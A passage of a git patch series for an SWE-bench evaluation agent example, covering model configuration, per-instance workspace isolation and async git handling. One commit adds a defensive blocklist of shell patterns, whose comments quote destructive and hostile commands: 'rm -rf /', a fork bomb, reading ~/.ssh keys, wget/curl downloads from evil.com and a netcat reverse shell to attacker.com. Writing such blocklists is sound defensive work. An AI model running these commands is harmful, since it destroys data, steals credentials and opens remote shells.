pallets__flask-4045 - #- psf__requests-1963 - #- pydata__xarray-3364 + # - sympy__sympy-21055 + # - sympy__sympy-11400 + # - astropy__astropy-12907 + # - astropy__astropy-6938 + # - django__django-15781 + # - django__django-11001 + # - mwaskom__seaborn-3010 + # - pallets__flask-4045 + # - psf__requests-1963 evaluators: swe_bench: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index 62ed3db61f..c2514ed222 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -13,6 +13,7 @@ # See the License for the specific language governing permissions and # limitations under the License. +import asyncio import logging from dataclasses import dataclass from pathlib import Path @@ -69,17 +70,23 @@ async def cleanup(self): def get_repo_path(workspace_dir: str, repo_url: str) -> Path: """Generate a unique path for the repository.""" - repo_name = repo_url.split('/')[-1].replace('.git', '') - return Path(workspace_dir) / repo_name + parts = repo_url.rstrip('/').split('/') + repo_name = parts[-1].replace('.git', '') + org_name = parts[-2] # Organization name + + # Return: workspace_dir/org/repo + return Path(workspace_dir) / org_name / repo_name async def clone_repository(repo_url: str, target_path: Path) -> Repo: """Clone a repository to the specified path.""" logger.info("Cloning repository %s to %s", repo_url, target_path) - return Repo.clone_from(repo_url, target_path) + # Use asyncio.to_thread to avoid blocking the event loop during clone operation + return await asyncio.to_thread(Repo.clone_from, repo_url, target_path) async def checkout_commit(repo: Repo, commit_hash: str): """Checkout a specific commit in the repository.""" logger.info("Checking out commit %s", commit_hash) - repo.git.checkout(commit_hash) + # Use asyncio.to_thread to avoid blocking the event loop during checkout + await asyncio.to_thread(repo.git.checkout, commit_hash) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index f4b5220264..9ec054a546 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -39,10 +39,16 @@ async def git_repo_tool(tool_config: GitRepoToolConfig, builder: Builder): # Simple async function that accepts a JSON string async def git_operations(args_str: str) -> str: - args = json.loads(args_str) + try: + args = json.loads(args_str) + except json.JSONDecodeError as e: + raise ValueError(f"Invalid JSON input: {e}") from e + operation = args.get('operation') if operation == "setup": + if 'repo_url' not in args or 'base_commit' not in args: + raise ValueError("setup operation requires 'repo_url' and 'base_commit'") context = await repo_manager.setup_repository(args['repo_url'], args['base_commit']) return str(context.repo_path) @@ -50,7 +56,7 @@ async def git_operations(args_str: str) -> str: await repo_manager.cleanup() return "Cleanup complete" - raise ValueError(f"Unknown operation: {operation}") + raise ValueError(f"Unknown operation: {operation}. Supported: 'setup', 'cleanup'") try: yield FunctionInfo.from_fn(git_operations, From 92b1e660bf9d6bdf6ca48d19c57fce7390cdbf1a Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Thu, 15 Jan 2026 16:47:46 -0800 Subject: [PATCH 03/22] feat(swe-bench): isolate workspace per instance for parallel execution Add instance_id to workspace path to prevent git conflicts between parallel instances. Each instance now uses .workspace/{instance_id}/org/repo instead of sharing .workspace/org/repo. Performance: 10 instances in ~8 min (vs ~30 min sequential) Results: 7/10 resolved (70%) with Claude Sonnet Signed-off-by: Jerry Guan --- .../configs/config_iterative.yml | 50 ++++++++--------- .../predict_iterative/predict_iterative.py | 11 ++-- .../predict_iterative/tools/git_tool.py | 56 ++++++++++++++----- .../predict_iterative/tools/register.py | 8 ++- 4 files changed, 76 insertions(+), 49 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml index 91fd997fb7..1ead5f8972 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -14,32 +14,28 @@ # limitations under the License. llms: - nim_llm: - _type: nim - model_name: mistralai/mistral-nemotron - temperature: 0.6 - max_tokens: 4096 - -llms: + nim_llm: + _type: nim + model_name: mistralai/mistral-nemotron + temperature: 0.0 + max_tokens: 4096 claude_sonnet_llm: _type: litellm model_name: anthropic/claude-sonnet-4-5-20250929 temperature: 0.0 - api_key: "${ANTHROPIC_API_KEY}" # Set this environment variable before running - -# llms: -# openai_llm: -# _type: litellm -# model_name: openai/gpt-5.2 -# temperature: 0.0 -# api_key: "${OPENAI_API_KEY}" # Set this environment variable before running + api_key: "${ANTHROPIC_API_KEY}" + openai_llm: + _type: litellm + model_name: openai/gpt-5.2 + temperature: 0.0 + api_key: "${OPENAI_API_KEY}" workflow: _type: swe_bench predictor: _type: iterative - llm_name: "claude_sonnet_llm" - step_limit: 250 + llm_name: "claude_sonnet_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm" + step_limit: 100 timeout: 60 functions: @@ -51,7 +47,7 @@ functions: eval: general: output_dir: .tmp/nat/examples/evaluation_and_profiling/swe_bench/iterative/ - max_concurrency: 1 + max_concurrency: 5 dataset: _type: parquet file_path: hf://datasets/princeton-nlp/SWE-bench_Lite/data/test-00000-of-00001.parquet @@ -63,15 +59,15 @@ eval: field: instance_id: - sympy__sympy-20590 - # - sympy__sympy-21055 - # - sympy__sympy-11400 - # - astropy__astropy-12907 - # - astropy__astropy-6938 - # - django__django-15781 - # - django__django-11001 - # - mwaskom__seaborn-3010 - # - pallets__flask-4045 - # - psf__requests-1963 + - sympy__sympy-21055 + - sympy__sympy-11400 + - astropy__astropy-12907 + - django__django-15781 + - astropy__astropy-6938 + - django__django-11001 + - mwaskom__seaborn-3010 + - pallets__flask-4045 + - psf__requests-1963 evaluators: swe_bench: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 19a980c4b1..78f4a93acb 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -414,7 +414,7 @@ def run_cmd(): except (TimeoutError, subprocess.TimeoutExpired) as e: # Extract output from exception if available (only subprocess.TimeoutExpired has output attribute) if isinstance(e, subprocess.TimeoutExpired) and hasattr(e, "output") and e.output: - output = e.output.decode("utf-8", errors="replace") + output = e.output if isinstance(e.output, str) else e.output.decode("utf-8", errors="replace") else: output = "" # Format timeout message using template @@ -446,16 +446,17 @@ async def predict_fn(self, swebench_input: SWEBenchInput) -> str: wrapper_type=LLMFrameworkEnum.LANGCHAIN ) - repo_name = swebench_input.instance_id.split('-')[0] + repo_name = swebench_input.instance_id.rsplit('-', 1)[0] # eg. scikit-learn__scikit-learn-14520 org, repo = repo_name.split('__') repo_url = f"https://github.com/{org}/{repo}" - # Setup repo + # Setup repo with instance_id for workspace isolation try: repo_path_str = await self.git_tool.arun(json.dumps({ "operation": "setup", "repo_url": repo_url, - "base_commit": swebench_input.base_commit + "base_commit": swebench_input.base_commit, + "instance_id": swebench_input.instance_id # Isolate workspace per instance })) repo_path = Path(repo_path_str) logger.info("Repository setup at %s", repo_path) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index c2514ed222..19e6c03c72 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -17,6 +17,7 @@ import logging from dataclasses import dataclass from pathlib import Path +from urllib.parse import urlparse from git import Repo @@ -27,13 +28,9 @@ class RepoContext: """Context manager for repository operations.""" repo_url: str - base_path: Path + repo_path: Path # Actual path where the repo is cloned repo: Repo | None = None - def __post_init__(self): - self.repo_name = self.repo_url.split('/')[-1].replace('.git', '') - self.repo_path = self.base_path / self.repo_name - class RepoManager: @@ -42,9 +39,18 @@ def __init__(self, workspace_dir: str): self.workspace.mkdir(parents=True, exist_ok=True) self.active_repos = {} - async def setup_repository(self, repo_url: str, base_commit: str) -> RepoContext: - """Setup a repository at a specific commit.""" - repo_path = get_repo_path(str(self.workspace), repo_url) + async def setup_repository( + self, repo_url: str, base_commit: str, instance_id: str | None = None + ) -> RepoContext: + """Setup a repository at a specific commit. + + Args: + repo_url: URL of the repository to clone + base_commit: Commit hash to checkout + instance_id: Optional instance ID for workspace isolation. When provided, + each instance gets its own clean workspace directory. + """ + repo_path = get_repo_path(str(self.workspace), repo_url, instance_id) if str(repo_path) in self.active_repos: context = self.active_repos[str(repo_path)] @@ -54,7 +60,7 @@ async def setup_repository(self, repo_url: str, base_commit: str) -> RepoContext repo = await clone_repository(repo_url, repo_path) await checkout_commit(repo, base_commit) - context = RepoContext(repo_url=repo_url, base_path=self.workspace, repo=repo) + context = RepoContext(repo_url=repo_url, repo_path=repo_path, repo=repo) self.active_repos[str(repo_path)] = context return context @@ -68,13 +74,33 @@ async def cleanup(self): self.active_repos.clear() -def get_repo_path(workspace_dir: str, repo_url: str) -> Path: - """Generate a unique path for the repository.""" - parts = repo_url.rstrip('/').split('/') +def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = None) -> Path: + """Generate a unique path for the repository. + + Args: + workspace_dir: Base workspace directory + repo_url: URL of the repository + instance_id: Optional instance ID for unique workspace isolation + + Returns: + Path to the repository. If instance_id is provided, returns + workspace_dir/instance_id/org/repo for complete isolation. + Otherwise returns workspace_dir/org/repo. + """ + if "://" in repo_url: + path = urlparse(repo_url).path + else: + # SSH form: git@host:org/repo.git + path = repo_url.split(":", 1)[-1] + parts = path.strip("/").split("/") repo_name = parts[-1].replace('.git', '') org_name = parts[-2] # Organization name - - # Return: workspace_dir/org/repo + + # If instance_id is provided, create isolated workspace per instance + if instance_id: + return Path(workspace_dir) / instance_id / org_name / repo_name + + # Default: workspace_dir/org/repo return Path(workspace_dir) / org_name / repo_name diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index 9ec054a546..e959a9b019 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -49,7 +49,11 @@ async def git_operations(args_str: str) -> str: if operation == "setup": if 'repo_url' not in args or 'base_commit' not in args: raise ValueError("setup operation requires 'repo_url' and 'base_commit'") - context = await repo_manager.setup_repository(args['repo_url'], args['base_commit']) + # instance_id is optional - when provided, creates isolated workspace per instance + instance_id = args.get('instance_id') + context = await repo_manager.setup_repository( + args['repo_url'], args['base_commit'], instance_id + ) return str(context.repo_path) if operation == "cleanup": From 6a69861532121043161cab46d8e1304c9caeb06f Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Fri, 16 Jan 2026 20:16:48 -0800 Subject: [PATCH 04/22] change nim_llm to nemotron-3-nano, add and fix license headers Signed-off-by: Jerry Guan --- .../configs/config_iterative.yml | 28 +++++++++---------- .../predictors/predict_iterative/__init__.py | 14 ++++++++++ .../predict_iterative/predict_iterative.py | 4 +-- .../predict_iterative/tools/__init__.py | 14 ++++++++++ .../predict_iterative/tools/git_tool.py | 2 +- .../predict_iterative/tools/register.py | 2 +- 6 files changed, 46 insertions(+), 18 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml index 1ead5f8972..0755550c6c 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -16,7 +16,7 @@ llms: nim_llm: _type: nim - model_name: mistralai/mistral-nemotron + model_name: nvidia/nemotron-3-nano-30b-a3b temperature: 0.0 max_tokens: 4096 claude_sonnet_llm: @@ -25,8 +25,8 @@ llms: temperature: 0.0 api_key: "${ANTHROPIC_API_KEY}" openai_llm: - _type: litellm - model_name: openai/gpt-5.2 + _type: openai + model_name: gpt-5.2 temperature: 0.0 api_key: "${OPENAI_API_KEY}" @@ -34,7 +34,7 @@ workflow: _type: swe_bench predictor: _type: iterative - llm_name: "claude_sonnet_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm" + llm_name: "openai_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm" step_limit: 100 timeout: 60 @@ -59,15 +59,15 @@ eval: field: instance_id: - sympy__sympy-20590 - - sympy__sympy-21055 - - sympy__sympy-11400 - - astropy__astropy-12907 - - django__django-15781 - - astropy__astropy-6938 - - django__django-11001 - - mwaskom__seaborn-3010 - - pallets__flask-4045 - - psf__requests-1963 + # - sympy__sympy-21055 + # - sympy__sympy-11400 + # - astropy__astropy-12907 + # - django__django-15781 + # - astropy__astropy-6938 + # - django__django-11001 + # - mwaskom__seaborn-3010 + # - pallets__flask-4045 + # - psf__requests-1963 evaluators: swe_bench: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py index e69de29bb2..7faa3b0ca9 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. \ No newline at end of file diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 78f4a93acb..3c877270f2 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -353,7 +353,7 @@ async def run(self, task: str) -> tuple[str, str]: async def _query_llm(self) -> str: """Query LLM and return response content.""" try: - response = await self.llm.ainvoke(self.messages) + response = await self.llm.ainvoke(self.messages) content = response.content if hasattr(response, 'content') else str(response) self.add_message("assistant", content) return content diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py index e69de29bb2..bcd923c929 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index 19e6c03c72..ddf9b666f8 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index e959a9b019..bffdf67b9b 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); From f80efcef62fb96c0998446ad66996ed3410c04e5 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Thu, 22 Jan 2026 11:45:23 -0800 Subject: [PATCH 05/22] clean up existed repo folder when downloading Signed-off-by: Jerry Guan --- .../predictors/predict_iterative/tools/git_tool.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index ddf9b666f8..9b3ae61082 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -15,6 +15,8 @@ import asyncio import logging +import os +import shutil from dataclasses import dataclass from pathlib import Path from urllib.parse import urlparse @@ -107,6 +109,8 @@ def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = N async def clone_repository(repo_url: str, target_path: Path) -> Repo: """Clone a repository to the specified path.""" logger.info("Cloning repository %s to %s", repo_url, target_path) + if os.path.exists(target_path): + shutil.rmtree(target_path) # Use asyncio.to_thread to avoid blocking the event loop during clone operation return await asyncio.to_thread(Repo.clone_from, repo_url, target_path) From f8f430a83fda3ae4f6897093ddabfc70430ab9a1 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Thu, 22 Jan 2026 12:26:16 -0800 Subject: [PATCH 06/22] fix CI warning: shutil.rmtree in an async function blocks the event loop Signed-off-by: Jerry Guan --- .../predictors/predict_iterative/tools/git_tool.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index 9b3ae61082..cc996bbf0d 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -110,7 +110,7 @@ async def clone_repository(repo_url: str, target_path: Path) -> Repo: """Clone a repository to the specified path.""" logger.info("Cloning repository %s to %s", repo_url, target_path) if os.path.exists(target_path): - shutil.rmtree(target_path) + await asyncio.to_thread(shutil.rmtree, target_path) # Use asyncio.to_thread to avoid blocking the event loop during clone operation return await asyncio.to_thread(Repo.clone_from, repo_url, target_path) From 4baa36cca02026e1d49477a8cb9e1ebf6e1135ac Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Tue, 27 Jan 2026 21:43:26 -0800 Subject: [PATCH 07/22] feat(swe-bench): add command validation to prevent dangerous shell commands Add security validation for LLM-generated bash commands before execution. Uses a blocklist approach to block dangerous patterns while maintaining full shell functionality for the agent. Blocked patterns include: - Destructive commands: rm -rf /, mkfs, fdisk, dd to devices - Privilege escalation: sudo, su, doas, pkexec, chmod 777 - Sensitive file access: /etc/shadow, ~/.ssh/, ~/.aws/ - Network exfiltration: wget/curl downloads, netcat reverse shells - Fork bombs Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 111 ++++++++++++++++++ 1 file changed, 111 insertions(+) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 3c877270f2..c6e2d51ddc 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -81,6 +81,112 @@ class IterativeAgentConfig: max_output_length: int = 10000 +# Dangerous command patterns that should be blocked for security. +# Each tuple contains (compiled_regex, error_message). +DANGEROUS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Destructive system commands ===== + # Examples: "rm -rf /", "rm -rf ~", "rm -fr /" + (re.compile(r'\brm\s+(-[^\s]*\s+)*[/~](\s|$)'), + "Deleting root or home directory is not allowed"), + + # Examples: "rm -rf ..", "rm -rf ../important" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\.\.'), + "Deleting parent directory is not allowed"), + + # Examples: "rm -rf *", "rm -rf ./*" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\*'), + "Wildcard deletion is not allowed"), + + # Examples: "> /dev/sda", "echo x > /dev/mem" (allows /dev/null) + (re.compile(r'>\s*/dev/(?!null)'), + "Writing to device files is not allowed"), + + # Examples: "mkfs.ext4 /dev/sda", "mkfs -t ext4 /dev/sda1" + (re.compile(r'\bmkfs\b'), + "Formatting disks is not allowed"), + + # Examples: "fdisk /dev/sda", "fdisk -l /dev/nvme0n1" + (re.compile(r'\bfdisk\b'), + "Disk partitioning is not allowed"), + + # Examples: "dd if=/dev/zero of=/dev/sda", "dd of=/dev/nvme0n1" + (re.compile(r'\bdd\s+.*\bof=/dev/'), + "Writing to devices with dd is not allowed"), + + # Examples: "dd if=/dev/sda of=disk.img" (reading sensitive disk data) + (re.compile(r'\bdd\s+.*\bif=/dev/'), + "Reading from devices with dd is not allowed"), + + # Fork bomb: :(){ :|:& };: + (re.compile(r':\(\)\s*\{\s*:\|:&\s*\}\s*;:'), + "Fork bomb detected"), + + # ===== Privilege escalation ===== + # Examples: "sudo rm -rf /", "echo pwd | sudo -S cmd", "/usr/bin/sudo cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?sudo\b'), + "sudo is not allowed"), + + # Examples: "doas rm file", "/usr/bin/doas cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?doas\b'), + "doas is not allowed"), + + # Examples: "pkexec rm file", "pkexec /bin/bash" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?pkexec\b'), + "pkexec is not allowed"), + + # Examples: "su root", "su - admin", "su -c 'command' user" + (re.compile(r'(?:^|[;&|`]\s*)su\s+(-[^\s]*\s+)*\w'), + "su is not allowed"), + + # Examples: "chmod 777 /", "chmod -R 0777 /var" + (re.compile(r'\bchmod\s+[0-7]*777\b'), + "Setting 777 permissions is not allowed"), + + # Examples: "chown root file", "chown root:root /etc/passwd" + (re.compile(r'\bchown\s+root\b'), + "Changing ownership to root is not allowed"), + + # ===== Sensitive file access ===== + # Examples: "cat /etc/shadow", "> /etc/passwd", "< /etc/sudoers" + (re.compile(r'[<>]\s*/etc/(?:passwd|shadow|sudoers)'), + "Accessing sensitive system files is not allowed"), + + # Examples: "cat ~/.ssh/id_rsa", "cat /home/user/.aws/credentials" + (re.compile(r'\bcat\s+.*/(?:\.ssh/|\.aws/|\.env\b)'), + "Reading sensitive credential files is not allowed"), + + # ===== Arbitrary code download and network exfiltration ===== + # Examples: "wget http://evil.com/malware.sh", "wget https://x.com/script" + (re.compile(r'\bwget\s+.*https?://'), + "Downloading from URLs with wget is not allowed"), + + # Examples: "curl http://evil.com/script.sh", "curl -O https://..." + (re.compile(r'\bcurl\s+.*https?://'), + "Downloading from URLs with curl is not allowed"), + + # Examples: "nc -e /bin/bash 10.0.0.1 4444", "ncat -e cmd attacker.com" + (re.compile(r'\b(?:nc|ncat|netcat)\b.*\s-[^\s]*e'), + "Netcat reverse shell is not allowed"), +] + + +def validate_command(command: str) -> tuple[bool, str]: + """Validate that a command is safe to execute. + + Args: + command: The bash command string to validate. + + Returns: + A tuple of (is_valid, error_message). + is_valid is True if the command passes all safety checks. + error_message is empty string if valid, otherwise describes the violation. + """ + for pattern, message in DANGEROUS_PATTERNS: + if pattern.search(command): + return False, message + return True, "" + + class IterativeAgent: """Iterative agent that executes commands step-by-step.""" @@ -373,6 +479,11 @@ async def _execute_action(self, response: str) -> str: command = matches[0].strip() + # Validate command for security before execution + is_valid, error_msg = validate_command(command) + if not is_valid: + raise FormatError(f"Command blocked for security: {error_msg}") + # Execute command using asyncio.to_thread to avoid blocking def run_cmd(): """Synchronous command execution function.""" From 75e94e37bbfebba6c658206e2a1bad3b755755b3 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Tue, 27 Jan 2026 22:18:50 -0800 Subject: [PATCH 08/22] feat(swe-bench): add timeout and error handling for git operations - Add timeout parameter to clone_repository (default 600s) and checkout_commit (default 120s) to prevent indefinite hangs - Add URL validation for repository URLs - Clean up partial clones on timeout or error - Improve logging for success and failure cases Signed-off-by: Jerry Guan --- .../predict_iterative/tools/git_tool.py | 72 ++++++++++++++++--- 1 file changed, 63 insertions(+), 9 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index cc996bbf0d..830504b513 100644 --- 